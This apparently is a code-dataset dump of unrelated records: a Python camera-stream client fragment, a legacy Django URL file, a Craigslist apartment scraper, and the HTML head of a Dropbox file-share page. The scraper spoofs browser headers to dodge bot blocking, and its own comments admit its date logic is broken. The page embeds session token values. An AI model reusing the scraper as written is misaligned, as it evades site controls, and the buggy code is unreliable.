                # Empty read means the peer closed the stream.
                # NOTE(review): the loop keeps spinning on EOF -- intended?
                print('No frame data')
            # print(connection.read(163840))
            # a = input('asdasd>')
            # if a != '':
            #     break
    except:
        raise
    finally:
        print('Closing connection...')
        # connection.close()
        client_socket.close()
        print('...closed.')
def main():
    """Initialise the camera server, start it, then consume the frame stream."""
    print('Starting')
    base_url = "http://127.0.0.1:5000"
    init(base_url)
    input('Enter')
    start_response = start(base_url)
    stream_addr = start_response['stream_address']
    if stream_addr is None:
        print('Received data didn\'t have socket address')
        return
    receive_data(stream_addr)
# Script entry point.
if __name__ == '__main__':
    main()
|
from django.conf.urls import url, patterns
from .views import MessageCreateView, MessageListView

# NOTE(review): patterns() and url() belong to the pre-1.10 Django URLconf
# API (patterns() was removed in Django 1.10) -- this file targets old Django.
urlpatterns = patterns(
    '',
    url(r'^add/$', MessageCreateView.as_view(), name='add'),
    url(r'^$', MessageListView.as_view(), name='list'),
)
|
19,714 | 0b162d8470f9fa385808d0da66326631b8f240ff | from bs4 import BeautifulSoup
import datetime
import calendar
from time import strptime
import requests
import csv
import re
import time
import random
from pathlib import Path
links = []

# Build a day-of-month "window" deciding how far back to scrape.
# NOTE(review): when day <= 7 the window becomes a LIST of ranges, but
# get_duplex() later does `check_day < window` -- comparing int < list
# raises TypeError on Python 3; the windowing logic needs a redesign.
date = datetime.datetime.today().strftime('%m-%d')
day = int(date.replace('-', '')[2:])
mtn = int(date.replace('-', '')[:2])
if day > 7:
    window = day - 7
elif day <= 7:
    get_end = 31 - day
    if mtn not in [2, 4, 9, 11]:
        if day != 1:
            window = [range(1, day), range(get_end, 32)]
        else:
            window = [day, range(get_end, 32)]
    if mtn not in [1, 2, 3, 5, 7, 8, 10, 12]:
        if day != 1:
            window = [range(1, day), range(get_end, 31)]
        else:
            window = [day, range(get_end, 31)]
    if mtn == 2:
        if day != 1:
            # Fixed: the original computed this list but never assigned it,
            # leaving a stale `window` in February.
            window = [range(1, day), range(get_end, 29)]
        else:
            window = [day, range(get_end, 29)]
def get_duplex(url):
    """Scrape one craigslist results page into the module-level `links` list.

    Returns 'done' when a listing older than the scrape window is seen,
    which tells cycle() to stop paging; otherwise returns None.
    """
    status = ''
    # Browser-like headers to avoid trivial bot blocking.
    headers = {
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
        'accept-encoding': 'gzip, deflate, br',
        'accept-language': 'en-US,en;q=0.8',
        'upgrade-insecure-requests': '1',
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
    }
    with requests.Session() as s:
        get_data = s.get(url, headers=headers)
        soup = BeautifulSoup(get_data.content, 'lxml')
        for title in soup.find_all('p', class_='result-info'):
            get_date = title.find('time', class_='result-date')
            # Listing dates render like "Mon DD"; take the day-of-month part.
            check_day = int((get_date.text)[4:])
            # NOTE(review): `window` may be a list when day <= 7 (see the
            # setup above); int < list raises TypeError on Python 3.
            if check_day < window:
                status = 'done'
                break
            check_mtn = (get_date.text)[:3]
            get_num_mtn = calendar.month_abbr[mtn]
            if check_day > window and get_num_mtn == check_mtn:
                get_link = title.find('a', class_='result-title')
                title = get_link.text
                data = [get_link.get('href'), title, get_date.text]
                links.append(data)
                print('made it')
    if status == 'done':
        return status
def cycle(url):
    """Page through craigslist results 140 at a time until get_duplex says 'done'."""
    offset = 140
    get_duplex(url)
    while offset < 2900:
        time.sleep(random.randint(2, 9))
        started = time.time()
        page_url = url + '?s={0}'.format(offset)
        if get_duplex(page_url) == 'done':
            break
        # Polite crawl pacing: roughly the server's response time plus 23s.
        elapsed = time.time() - started
        time.sleep(elapsed + 23)
        print('NEEEEXT!')
        offset = offset + 140
def write_info(url, place):
    """Scrape all listings for `url` and dump them to louisville<place>.csv.

    Fixes: the CSV handle is now closed deterministically via a context
    manager (the original leaked it), and the file is opened with newline=''
    as the csv module requires to avoid blank rows on Windows.
    """
    # City name is the subdomain: "https://<city>.craigslist.org/...".
    get_area = re.search(r"\/\/\w+", url)
    city = (get_area.group())[2:]
    cycle(url)
    with open('louisville{0}.csv'.format(place), 'w', newline='') as csv_file:
        csv_writer = csv.writer(csv_file)
        csv_writer.writerow(['City', 'URL', 'Title', 'DatePosted', 'Price', 'Email', 'Phone'])
        for link in links:
            csv_writer.writerow([city, link[0], link[1], link[2]])
#print(time.time())
#write_info('https://louisville.craigslist.org/search/roo', 'Roo')
#print(time.time())
#time.sleep(150)
# Retry scraping apartments until the output CSV exists on disk.
my_file = Path("louisvilleApa.csv")
print(time.time())
done = False
while done == False:
    if my_file.is_file():
        done = True
        print(time.time())
    else:
        try:
            write_info('https://louisville.craigslist.org/search/apa', 'Apa')
        except Exception:
            # Fixed: the original bare `except:` also swallowed
            # KeyboardInterrupt/SystemExit, making the loop unstoppable.
            # Best-effort retry behavior is preserved.
            continue
|
19,715 | fc670db732df8170e27c331e14a25e55e32864df | <!DOCTYPE html><html lang="en" xmlns:fb="http://ogp.me/ns/fb#" xml:lang="en" class="" xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascript">
window._document_observe_listeners = [];
document.observe = function(event, func) {
window._document_observe_listeners.push({event: event, func: func});
};
window._jquery_ready_handlers = [];
jQuery = function(handler) {
window._jquery_ready_handlers.push(handler);
};
function on_script_loaded(func) {
(window.LoadedJsSuccessfully && document.loaded) ? func() : document.observe('script:loaded', func);
}
</script> <link href="https://dt8kf6553cww8.cloudfront.net/static/images/favicon-vflk5FiAC.ico" rel="shortcut icon" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/main-vflrsqIdX.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/css/web_sprites-vflTkIkhK.css" type="text/css" rel="stylesheet" /><link href="https://dt8kf6553cww8.cloudfront.net/static/images/dropbox_webclip-vflO8tEZ4.png" rel="apple-touch-icon" /><link href="/w3c/p3p.xml" rel="P3Pv1" /><script type="text/javascript">window.ST=+new Date();</script><meta content="text/html; charset=UTF-8" http-equiv="content-type" /><meta content="Dropbox is a free service that lets you bring your photos, docs, and videos anywhere and share them easily. Never email yourself a file again!" name="description" /><meta content="online storage, free storage, file sharing, share files,
awesome, cloud storage, online backup, cross platform, sync, sharing, mac,
windows, os x, linux, backup, collaboration, file versioning, file revisions,
remote access, undelete" name="keywords" /><meta content="IE=EDGE" http-equiv="X-UA-Compatible" /><meta content="noindex" name="robots" /><meta content="RaspberryPiUptime.py" property="og:title" /><meta content="Shared with Dropbox" property="og:description" /><meta content="https://www.dropbox.com/static/images/icons128/page_white_code.png" property="og:image" /><meta content="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" property="og:url" /><meta content="website" property="og:type" /><meta content="Dropbox" property="og:site_name" /><meta content="210019893730" property="fb:app_id" /><meta content="summary" name="twitter:card" /><meta content="@Dropbox" name="twitter:site" /><meta content="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" name="twitter:url" /><meta content="RaspberryPiUptime.py" name="twitter:title" /><meta content="Shared with Dropbox" name="twitter:description" /><meta content="https://www.dropbox.com/static/images/icons128/page_white_code.png" name="twitter:image" /><meta content="TnuSyOnBMNmtugbpL1ZvW2PbSF9LKvoTzrvOGS9h-b0" name="google-site-verification" /><meta content="EZKIczQcM1-DVUMz8heu1dIhNtxNbLqbaA9-HbOnCQ4" name="google-site-verification" /><meta content="tz8iotmk-pkhui406y41y5bfmfxdwmaa4a-yc0hm6r0fga7s6j0j27qmgqkmc7oovihzghbzhbdjk-uiyrz438nxsjdbj3fggwgl8oq2nf4ko8gi7j4z7t78kegbidl4" name="norton-safeweb-site-verification" /><meta content="https://dt8kf6553cww8.cloudfront.net/static/images/win8_web_tile-vfl8eyKFU.png" name="msapplication-TileImage" /><meta content="#ffffff" name="msapplication-TileColor" /><title>Dropbox - RaspberryPiUptime.py</title><script type="text/javascript">var Constants = {"protocol": "https", "SUBSCRIBE_URL": "/subscribe", "_viewer_properties": {"_user_data": []}, "NOTIFICATION_TYPE_META": -1, "DISABLE_VIDEOS_IN_LIGHTBOX": false, "DOC_PREVIEW_IN_PROGRESS": 2, "team_id": "", "BATCH_THUMB_ENDPOINTS": ["//photos-1.dropbox.com/btjb", "//photos-2.dropbox.com/btjb", 
"//photos-3.dropbox.com/btjb", "//photos-4.dropbox.com/btjb", "//photos-5.dropbox.com/btjb", "//photos-6.dropbox.com/btjb"], "GSLB_ENABLED": 0, "REQUEST_ID": "fdcd53d9d49b069cc67a61d1d43e8bcd", "static_url_video_js_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/video-js-vflMfTkZb.swf", "BLOCK_CLUSTER": "dl-web.dropbox.com", "DELETE_ON_UNLINK_SUPPORTED": 1, "personal_email": "", "MAX_EXCEL_FILE_SIZE_B": "104857600", "DISABLE_VIDEO_ICONS": false, "static_url_pdfjs_viewer": "/static/javascript/external/pdf-js/viewer.html", "TWO_ITEM_LIST": "%(x)s and %(y)s", "static_url_copy_clipboard_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/copy_clipboard-vflvMcZTC.swf", "LIVE_TRANSCODE_SERVER": "showbox-tr.dropbox.com", "DELETE_ON_UNLINK_UNSUPPORTED": 3, "ADMIN": 0, "IS_PROD": 1, "cached_contacts_enabled": 0, "TOKEN": "8j8BaT-RNXpqPrZXN5bmAKpD", "SVN_REV": "3306785450", "date_format": "M/d/yyyy", "MAX_TEXT_FILE_SIZE_B": "4194304", "static_url_moxie_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/Moxie-vflz978zN.swf", "USER_LOCALE": "en", "sess_id": "311064460198519621729641865408209193887", "referrer": "", "quicksend_enabled": 0, "LOCALES": [["en", "English"], ["de", "Deutsch"], ["es", "Espa\u00f1ol (Latinoam\u00e9rica)"], ["es_ES", "Espa\u00f1ol (Espa\u00f1a)"], ["fr", "Fran\u00e7ais"], ["id", "Bahasa Indonesia"], ["it", "Italiano"], ["ja", "\u65e5\u672c\u8a9e"], ["ko", "\ud55c\uad6d\uc5b4"], ["ms", "Bahasa Malaysia"], ["pl", "Polski"], ["pt_BR", "Portugu\u00eas (Brasil)"], ["ru", "P\u0443\u0441\u0441\u043a\u0438\u0439"], ["zh_CN", "\u4e2d\u6587\uff08\u7b80\u4f53\uff09"], ["zh_TW", "\u4e2d\u6587\uff08\u7e41\u9ad4\uff09"]], "datetime_format": "M/d/yyyy h:mm a", "ROLE_PHOTOS": "photos", "uid": "", "TIMEZONE_OFFSET": 0, "NOTSERVER": "notify1.dropbox.com:80", "THREE_ITEM_LIST": "%(x)s, %(y)s, and %(z)s", "ROLE_WORK": "work", "root_ns": 0, "DELETE_ON_UNLINK_OLD_CLIENT": 2, "DOC_PREVIEW_UNAVAILABLE": 1, "team_name": "", "WEB_TIMING_ENABLED": 1, 
"DOC_PREVIEW_AVAILABLE": 0, "upload_debug": false, "ROLE_PARAM": "role", "static_url_video_overlay": "https://dt8kf6553cww8.cloudfront.net/static/images/icons/video_overlay-vfld7VbHa.png", "ROLE_PERSONAL": "personal", "email": "", "GANDALF_PANEL": 0, "static_url_swfupload_swf": "https://dt8kf6553cww8.cloudfront.net/static/swf/swfupload-vfl8U9T2v.swf", "CPROFILE_PARAMETER": "", "EMAIL_VERIFIED": 0, "PUBSERVER": "dl.dropboxusercontent.com", "time_format": "h:mm a", "IS_SPDY": 0, "work_email": "", "PDF_PREVIEW_MODE": null, "MAX_DOC_FILE_SIZE_B": "20971520", "UID_PARAM_NAME": "_subject_uid", "send_a_copy_enabled": 0, "WEBSERVER": "www.dropbox.com", "static_url_syntax_js": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/syntax-vflpNqebu.js", "WIT_VERSION": 6, "FACEBOOK_APP_ID": "210019893730", "CPROFILE_ENABLED": 0, "block": "dl-web.dropbox.com"};</script><script type="text/javascript">
// Script-load watchdog: a later script is expected to flip this flag to true.
// If it hasn't done so within 5 seconds of window 'load', report the failure
// via a tracking-pixel request to /jse.
window.LoadedJsSuccessfully = false;
if (window.addEventListener) {
    var reportLoadFailure = function() {
        if (window.LoadedJsSuccessfully) {
            return; // main JS arrived — nothing to report
        }
        var pageUrl = encodeURIComponent(window.location.href);
        // Beacon via an Image request; no response handling needed.
        var beacon = new Image();
        beacon.src = '/jse?e=failed+to+load+script&loc=' + pageUrl + '&f=' + pageUrl;
    };
    window.addEventListener('load', function() {
        window.setTimeout(reportLoadFailure, 5000);
    }, false);
}
</script><script type="text/javascript">window.VFL_PREFIX = "https://dt8kf6553cww8.cloudfront.net/static/"; window.REQUIRE_JS_PATHS = {"teams/change_team_member_email_modal": "teams/change_team_member_email_modal-vfltiYie9", "browser_detection": "browser_detection-vflCe73eD", "external/codemirror-0.91/js/stringstream": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/stringstream-vflNbOUg2", "saver": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/saver-mini-vfl8I2liS", "https://www.dropboxstatic.com/static/javascript/compiled/saver-mini-vfl8I2liS"], "moar_space": "moar_space-vfl-LknTi", "tests/login_form": "tests/login_form-vfl9pagbr", "mobile/help": "mobile/help-vfl3wTppS", "external/codemirror-0.91/js/select": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/select-vflQ2MWFi", "external/jquery": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jquery-vflrOa9og", "links/links": "links/links-vflbM454Y", "teams/admin_chat": "teams/admin_chat-vflocweoc", "web_interaction_logger": "web_interaction_logger-vfllTzm4G", "dropins_sdk/generic": "dropins_sdk/generic-vfl1lnov2", "complete_setup": "complete_setup-vfl-p7FMI", "browse/browse": "browse/browse-vfl0KBQ_I", "photos/mobile_photo_share_page": "photos/mobile_photo_share_page-vflFOrQUB", "widgets/endscript": "widgets/endscript-vfl_Es2mq", "dropins/desktop_chooser": "dropins/desktop_chooser-vflDuICeQ", "browse/browse_actions": "browse/browse_actions-vflUPnbb1", "external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-bundle": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-bundle-vflTUy7h8", "photos/photos_tour": "photos/photos_tour-vflFiEJ1Z", "dropins/universal_chooser": "dropins/universal_chooser-vfl8JBPA9", "components/login_or_register": "components/login_or_register-vfl5J6V8O", 
"external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/labellers-vfl6XBI6t", "timezone": "timezone-vfl-wyFcA", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/timeline-vfl1YoxID", "developers_dropins": "developers_dropins-vflzz5iJH", "control/change_email": "control/change_email-vfluxhxIZ", "teams/invite": "teams/invite-vflaY43Yi", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/de/labellers-vfly3_J7m", "tests/sso_login_checks_test": "tests/sso_login_checks_test-vfl1uDGNH", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/it/timeline-vflSGPpNM", "external/timeline/timeline_2.3.0/timeline_ajax/scripts/signal": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_ajax/scripts/signal-vfly0smhS", "mobile/forms": "mobile/forms-vflAtO17v", "control/restore": "control/restore-vflVK44ew", "widgets/db_calendar": "widgets/db_calendar-vflVwan-E", "teams/handle_pricing_table": "teams/handle_pricing_table-vflbkoQOa", "util": "util-vfl159ZSR", "print": "print-vflZtvqpl", "external/codemirror-0.91/contrib/scheme/js/parsescheme": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/scheme/js/parsescheme-vflCn3g1v", "admin/support": "admin/support-vflhTnzIn", "admin/teams": "admin/teams-vflrjru5f", "widgets/spinner": "widgets/spinner-vflii0syQ", "connect_v3": "connect_v3-vflXoGkIw", "dropboxapi": 
["https://dt8kf6553cww8.cloudfront.net/static/api/1/dropbox-vflL-aNrY", "https://www.dropboxstatic.com/static/api/1/dropbox-vflL-aNrY"], "control/verify_email_modal": "control/verify_email_modal-vflgGtDRF", "sharing/shmodal_panes": "sharing/shmodal_panes-vflnH7W8J", "dropins/multi_login_iframe": "dropins/multi_login_iframe-vflU79nN-", "control/help": "control/help-vflRf9kIR", "security_tab": "security_tab-vfl4ggbl7", "upload": "upload-vflheAjFE", "external/braintree": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/braintree-vfl4-cBUl", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/labellers-vflyIqOt8", "external/modernizr": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/modernizr-vflTot8RG", "date_util": "date_util-vfl1euJ9z", "contacts/importer": "contacts/importer-vflRCw2SI", "external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-api": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_ajax/simile-ajax-api-vflo5IzV7", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/vi/timeline-vflkac1Si", "external/common_passwords": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/common_passwords-vfliZ-81G", "browse/flex_column": "browse/flex_column-vflTCtJzs", "file_events": "file_events-vflKuVeX3", "teams/admin_table": "teams/admin_table-vfl7KiM5w", "external/codemirror-0.91/js/undo": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/undo-vflcKMw73", "external/prettify/lang-clj": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-clj-vflRXDAdc", "sharing/modals": "sharing/modals-vflrweCob", "branding": "branding-vflxfNpJF", 
"control/select_role_modal": "control/select_role_modal-vflnpBaWm", "control/password_change": "control/password_change-vflKETfKG", "developers_language_switcher": "developers_language_switcher-vfl4jxc7h", "widgets/undo_action": "widgets/undo_action-vflH9BPn_", "audio_player": "audio_player-vfl8nHXn7", "analytics": "analytics-vfl-pZP3F", "external/html5shiv": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/html5shiv-vflMALGFj", "widgets/jump_watcher": "widgets/jump_watcher-vflp8HrCl", "tutorial_common": "tutorial_common-vflkt7DXs", "external/codemirror-0.91/contrib/csharp/js/parsecsharp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/csharp/js/parsecsharp-vflr1KC17", "debug_panel": "debug_panel-vfl73B9be", "download": "download-vflSEaJz2", "teams/add_event_title": "teams/add_event_title-vflHPiR-E", "dropins/universal_saver": "dropins/universal_saver-vfl2ghtP5", "jquery/endscript": "jquery/endscript-vfldUt_eD", "index": "index-vflo_xt1d", "admin/changesets": "admin/changesets-vflV7oBfO", "web_timing_logger": "web_timing_logger-vflHX-Pon", "external/codemirror-0.91/contrib/plsql/js/parseplsql": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/plsql/js/parseplsql-vflvj2umu", "external/codemirror-0.91/contrib/ometa/js/parseometa": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/ometa/js/parseometa-vflOisWRW", "external/codemirror-0.91/contrib/java/js/parsejava": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/java/js/parsejava-vflFl2VPZ", "user": "user-vfl7v0Bl_", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/nl/timeline-vfl06PRm-", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/labellers": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/es/labellers-vflPbquVY", "business": "business-vfll1rLr8", "control/news": "control/news-vflY7INgC", "widgets/db_bubble": "widgets/db_bubble-vfl-phzeA", "sharing/sharing_model": "sharing/sharing_model-vflbfdKRv", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/labellers-vflU21MVS", "teams/sem_landing_page": "teams/sem_landing_page-vflXsGbf6", "external/syntax": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/syntax-vflpNqebu", "tests/uri_test": "tests/uri_test-vfl1STxUZ", "unpair_modal": "unpair_modal-vflgFuPZs", "jobs": "jobs-vfl2maeO3", "install": "install-vflHucTOe", "external/plupload_dev": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/plupload_dev-vfllSwP4V", "db_select": "db_select-vflTKU1Ra", "top_notification_bar": "top_notification_bar-vfl2-3Ozn", "sharing/team_external_share_confirm": "sharing/team_external_share_confirm-vflh9oJnw", "sharing/state": "sharing/state-vflSkcvJV", "mobile/social": "mobile/social-vflaNlqsM", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/fr/labellers-vfl0HRR8z", "external/video": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/video-vflOA8pnm", "photos/photos_selection": "photos/photos_selection-vflabXrza", "dropins_mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/dropins-mobile-mini-vfl3supBI", "https://www.dropboxstatic.com/static/javascript/compiled/dropins-mobile-mini-vfl3supBI"], "viewer_shim": "viewer_shim-vflp-X5YL", "teams/teamsetup": "teams/teamsetup-vfl9Vbm7J", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/timeline": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/zh/timeline-vfl5_vMu5", "photos/photos_collections": "photos/photos_collections-vflnptIL7", "control/promo_holder": "control/promo_holder-vflYYMqP6", "sharing/api": "sharing/api-vfl49GtZ7", "mobile/lightbox": "mobile/lightbox-vflA-eQEJ", "dropins/hostsite_callback_url": "dropins/hostsite_callback_url-vflZRWdvh", "tour": "tour-vfl4mKJm8", "control/tab_controller": "control/tab_controller-vfl9cf7p7", "widgets/browse_style_rows": "widgets/browse_style_rows-vflxcms3P", "file_viewer": "file_viewer-vfli31JEX", "sharing/shmodel": "sharing/shmodel-vflC8eWxd", "history": "history-vflunP3bN", "control/account_extras": "control/account_extras-vfllYyZ-4", "widgets/notify": "widgets/notify-vflvaZLWG", "widgets/suggestion_input": "widgets/suggestion_input-vflWMI1LG", "external/codemirror-0.91/contrib/csharp/js/tokenizecsharp": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/csharp/js/tokenizecsharp-vflyEMudq", "business_create": "business_create-vflpZ-92d", "dropins/mobile_chooser": "dropins/mobile_chooser-vflxnZMKA", "widgets/modal": "widgets/modal-vfly4VJxC", "enable_public_folder": "enable_public_folder-vfl_SqK30", "widgets/tooltip": "widgets/tooltip-vflUpmzMV", "teams/disable_desktop_2account_modal": "teams/disable_desktop_2account_modal-vflq_uF3N", "teams/team_payments": "teams/team_payments-vflP9BLeU", "dropins/mobile_saver": "dropins/mobile_saver-vflGfwfwr", "teams/account": "teams/account-vflyJbQx9", "admin/uilibrary": "admin/uilibrary-vfliBO6Gc", "mobile/twofactor": "mobile/twofactor-vflduosRX", "control/bonus_table": "control/bonus_table-vfleQBQnL", "browse/browse_file": "browse/browse_file-vflP5wClW", "browse/context_menu": "browse/context_menu-vfl9p5JC-", "control/downgrade_reasons": "control/downgrade_reasons-vfli52Zm6", "password_strength_watcher": "password_strength_watcher-vflDwEGNw", "teams/invite_modal": 
"teams/invite_modal-vflT29NyR", "external/jshint": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/jshint-vflP-d-6O", "annotate_crop": "annotate_crop-vflo8hqxS", "widgets/fresh_dropdown": "widgets/fresh_dropdown-vflZ_f7c9", "teams/domains_table": "teams/domains_table-vflbpWSJT", "external/codemirror-0.91/js/parsedummy": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsedummy-vfltunF1m", "music": "music-vflD460II", "mobile/photos": "mobile/photos-vfl2i9ib9", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/timeline-vflpWDeA2", "widgets/sick_input": "widgets/sick_input-vfluzU2Pr", "sharing/autocompleter_contacts": "sharing/autocompleter_contacts-vflRVjk0Z", "mobile/dom_util": "mobile/dom_util-vflGe6Y8N", "control/get_space": "control/get_space-vfl1ftOD_", "libs_mobile": ["https://dt8kf6553cww8.cloudfront.net/static/javascript/compiled/libs-mobile-mini-vflRamYiX", "https://www.dropboxstatic.com/static/javascript/compiled/libs-mobile-mini-vflRamYiX"], "external/sha1": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/sha1-vflgHBuGL", "external": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external", "photos/photo_share_layout": "photos/photo_share_layout-vfl9OktKk", "i18n": "i18n-vflR0k-PG", "external/prettify/lang-ml": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-ml-vfl9JZEZU", "account": "account-vflEi1r93", "sortable": "sortable-vfl5rLkKV", "teams/admin_tab": "teams/admin_tab-vflrYVKdo", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/en/timeline-vflZsi2U5", "mobile/browse_file": "mobile/browse_file-vflipydem", "external/codemirror-0.91/js/editor": 
"https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/editor-vflGqqKH6", "datastore_explorer": "datastore_explorer-vflq8kmz_", "photos/photo_event": "photos/photo_event-vflDyvXqP", "sharing/wizard_modals": "sharing/wizard_modals-vfl7ReXbe", "browse/browse_url": "browse/browse_url-vflRoo6Qj", "switch_login": "switch_login-vflbGwxT0", "lightbox_previews": "lightbox_previews-vflQuTij8", "core/uri": "core/uri-vflfkcedz", "custom_effects": "custom_effects-vfl6Qm0kC", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/cs/labellers-vflPd0oXf", "external/prettify/lang-n": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-n-vflngnHa8", "external/pdf-js/viewer-mini": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/pdf-js/viewer-mini-vflH7Dei5", "external/prettify/lang-scala": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-scala-vflWryIvk", "browse/browse_sort": "browse/browse_sort-vflMpoNcs", "external/codemirror-0.91/contrib/python/js/parsepython": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/python/js/parsepython-vflba_lPg", "external/prettify/lang-tex": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-tex-vflzDJlKS", "external/prettify/lang-apollo": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/prettify/lang-apollo-vflssc3RC", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/labellers": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/tr/labellers-vflEBWuvJ", "batch_logger": "batch_logger-vfl4b0P_h", "widgets/login_dropdown": "widgets/login_dropdown-vfljYwORz", "common/change_name": "common/change_name-vfltOyc_i", "tests/bug_reporter": 
"tests/bug_reporter-vflYPqix_", "twofactor": "twofactor-vfl7n3J5l", "dropins/desktop_saver": "dropins/desktop_saver-vflOV3BEe", "control/recover": "control/recover-vflXvLsas", "sharing/autocompleter_contacts_tokenizer": "sharing/autocompleter_contacts_tokenizer-vflk_ANES", "db_login_form": "db_login_form-vfl_l6v83", "tests/util_test": "tests/util_test-vfl2uwOMM", "external/codemirror-0.91/contrib/xquery/js/parsexquery": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/contrib/xquery/js/parsexquery-vfld0YbzB", "external/codemirror-0.91/js/parsexml": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/codemirror-0.91/js/parsexml-vfl5dRK-7", "tests/jquery_ext": "tests/jquery_ext-vflK0sg2u", "events": "events-vfl5DBKwC", "external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/timeline": "https://dt8kf6553cww8.cloudfront.net/static/javascript/external/timeline/timeline_2.3.0/timeline_js/scripts/l10n/ru/timeline-vflinhUOK", "profile": "profile-vflLMCDc_", "mobile/upgrade": "mobile/upgrade-vflAi_0Pg", "admin/help": "admin/help-vfl5Y4PsW", "progress_watcher": "progress_watcher-vflItlamR", 